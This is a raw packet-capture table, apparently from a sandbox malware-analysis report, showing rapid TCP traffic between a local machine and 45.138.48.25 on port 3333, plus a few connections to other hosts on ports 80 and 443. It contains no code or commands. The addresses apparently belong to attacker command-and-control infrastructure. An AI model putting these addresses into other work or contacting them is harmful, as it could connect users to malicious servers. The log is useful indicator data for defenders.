                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.707459927 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.707528114 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.707546949 CET497143333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.708707094 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.708786011 CET497143333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.708837986 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.709948063 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.710046053 CET497143333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.710059881 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.711221933 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.711328983 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.711345911 CET497143333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.712481022 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.712555885 CET497143333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.712590933 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.713721037 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.713844061 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.714132071 CET497143333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.714971066 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.715034008 CET497143333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.715063095 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.716243029 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.716301918 CET497143333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.716341972 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.717495918 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.717586040 CET497143333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.717612982 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.718744993 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.718823910 CET497143333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.718856096 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.720043898 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.720160961 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.720174074 CET497143333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.721230030 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.721363068 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.721436977 CET497143333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.722490072 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.722568989 CET497143333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.722600937 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.723756075 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.723834991 CET497143333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.723869085 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.725001097 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.725138903 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.725208044 CET497143333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.726264954 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.726322889 CET497143333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.726386070 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.727552891 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.727655888 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.727720022 CET497143333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.728769064 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.728892088 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.728997946 CET497143333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.730036974 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.730087996 CET497143333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.730149984 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.731376886 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.731483936 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.731594086 CET497143333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.732558012 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.732660055 CET497143333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.732693911 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.733803988 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.733861923 CET497143333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.733912945 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.735069036 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.735152960 CET497143333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.735184908 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.736305952 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.736370087 CET497143333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.736423969 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.737596989 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.737660885 CET497143333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.737740993 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.738852978 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.738934994 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.738953114 CET497143333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.740084887 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.740174055 CET497143333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.740186930 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.741338015 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.741389990 CET497143333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.741457939 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.742561102 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.742652893 CET497143333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.742686033 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.743835926 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.743993044 CET497143333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.866903067 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.866957903 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.867079020 CET497143333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.867378950 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.867477894 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.867548943 CET497143333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.868320942 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.868522882 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.868603945 CET497143333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.868638039 CET8049718178.237.33.50192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.868681908 CET4971880192.168.2.6178.237.33.50
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.869316101 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.869406939 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.869463921 CET497143333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.870240927 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.870346069 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.870418072 CET497143333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.871193886 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.871289015 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.871331930 CET497143333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.872143030 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.872262955 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.872332096 CET497143333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.873162985 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.873224020 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.873347044 CET497143333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.874099970 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.874270916 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.874331951 CET497143333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.875034094 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.875152111 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.875994921 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.876060009 CET497143333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.876089096 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.876132011 CET497143333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.876936913 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.877053976 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.877121925 CET497143333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.877923965 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.878026962 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.878103018 CET497143333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.878868103 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.879062891 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.879283905 CET497143333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.879889965 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.879940987 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.880788088 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.880852938 CET497143333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.880889893 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.880935907 CET497143333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.881757975 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.881938934 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.882077932 CET497143333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.882700920 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.882817030 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.883671999 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.883728027 CET497143333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.883779049 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.883830070 CET497143333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.884612083 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.884720087 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.884778976 CET497143333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.885576010 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.885672092 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.886542082 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.886619091 CET497143333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.886640072 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.886709929 CET497143333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.887480021 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.887626886 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.888472080 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.888474941 CET497143333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.888566971 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.889442921 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.889502048 CET497143333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.889569998 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.889671087 CET497143333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.890367985 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.890491009 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.891402960 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.891459942 CET497143333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.891501904 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.891549110 CET497143333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.892297983 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.892390013 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.892457962 CET497143333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.893258095 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.893378019 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.894212008 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.894330978 CET497143333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.894340992 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.894434929 CET497143333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.895160913 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.895282030 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.896130085 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.896208048 CET497143333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.896236897 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.896337032 CET497143333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.897083044 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.897186041 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.897237062 CET497143333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.898073912 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.898176908 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.899007082 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.899065018 CET497143333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.899120092 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.899184942 CET497143333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.899954081 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.900067091 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.900480986 CET497143333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.900916100 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.901097059 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.901870966 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.901932955 CET497143333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.901966095 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.902038097 CET497143333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.902827978 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.902928114 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.902983904 CET497143333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.903801918 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.903934002 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.904453993 CET497143333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.904769897 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.904918909 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.905708075 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.905776024 CET497143333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.905811071 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.905875921 CET497143333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.906670094 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.906827927 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.907162905 CET497143333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.907629967 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.907757044 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.907847881 CET497143333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.908588886 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.908701897 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.908838987 CET497143333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.909560919 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.909677029 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.909796000 CET497143333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.910490036 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.910609007 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.910731077 CET497143333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.911458015 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.911539078 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.911609888 CET497143333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.969188929 CET497123333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:10.089179039 CET33334971245.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:10.758857965 CET44349703173.222.162.64192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:10.760503054 CET49703443192.168.2.6173.222.162.64
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:10.781579971 CET4434971923.218.208.109192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:10.781651974 CET49719443192.168.2.623.218.208.109
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:10.787815094 CET49719443192.168.2.623.218.208.109
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:10.787827015 CET4434971923.218.208.109192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:10.788065910 CET4434971923.218.208.109192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:10.789448977 CET49719443192.168.2.623.218.208.109
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:10.831341028 CET4434971923.218.208.109192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:10.870660067 CET8049718178.237.33.50192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:10.870762110 CET4971880192.168.2.6178.237.33.50
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:11.320887089 CET4434971923.218.208.109192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:11.320976973 CET4434971923.218.208.109192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:11.321038008 CET49719443192.168.2.623.218.208.109
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:11.435784101 CET49719443192.168.2.623.218.208.109
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:11.435784101 CET49719443192.168.2.623.218.208.109
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:11.435823917 CET4434971923.218.208.109192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:11.435837030 CET4434971923.218.208.109192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:11.779351950 CET497143333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:11.899415970 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:11.899487972 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:11.899580002 CET33334971445.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:11.899580956 CET497143333192.168.2.645.138.48.25
